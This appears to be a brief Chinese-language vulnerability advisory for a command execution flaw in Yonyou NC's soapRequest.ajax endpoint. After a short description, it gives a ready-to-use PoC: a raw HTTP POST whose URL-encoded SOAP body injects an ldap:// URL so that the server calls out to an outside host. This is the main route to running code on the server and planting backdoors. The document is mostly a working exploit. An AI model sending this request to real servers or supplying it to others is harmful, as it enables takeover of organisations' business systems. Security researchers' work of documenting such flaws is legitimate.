漏洞描述
用友NC是用友公司推出的面向集团企业的高端管理软件,采用J2EE架构和UAP平台开发,整合云计算、移动应用等技术,提供全球化管控、全产业链协同、动态企业建模等功能。用友nc soapRequest.ajax 存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友nc soapRequest.ajax 命令执行漏洞
PoC代码
POST /uapws/soapRequest.ajax HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 625
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
ws=nc.itf.msgcenter.IMsgCenterWebService&soap=%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3cenv%3aEnvelope%20xmlns%3aenv%3d%22http%3a%2f%2fschemas.xmlsoap.org%2fsoap%2fenvelope%2f%22%20xmlns%3asn%3d%22http%3a%2f%2fmsgcenter.itf.nc%2fIMsgCenterWebService%22%3e%3cenv%3aHeader%2f%3e%3cenv%3aBody%3e%3csn%3auploadAttachment%3e%3cdataSource%3eldap%3a%2f%2fvanecomyhj.iyhc.eu.org%2fTest%3c%2fdataSource%3e%3cmsgtype%3e%3f%3c%2fmsgtype%3e%3cpk_sourcemsg%3e%3f%3c%2fpk_sourcemsg%3e%3cfilename%3e%3f%3c%2ffilename%3e%3cfile%3e%3f%3c%2ffile%3e%3c%2fsn%3auploadAttachment%3e%3c%2fenv%3aBody%3e%3c%2fenv%3aEnvelope%3e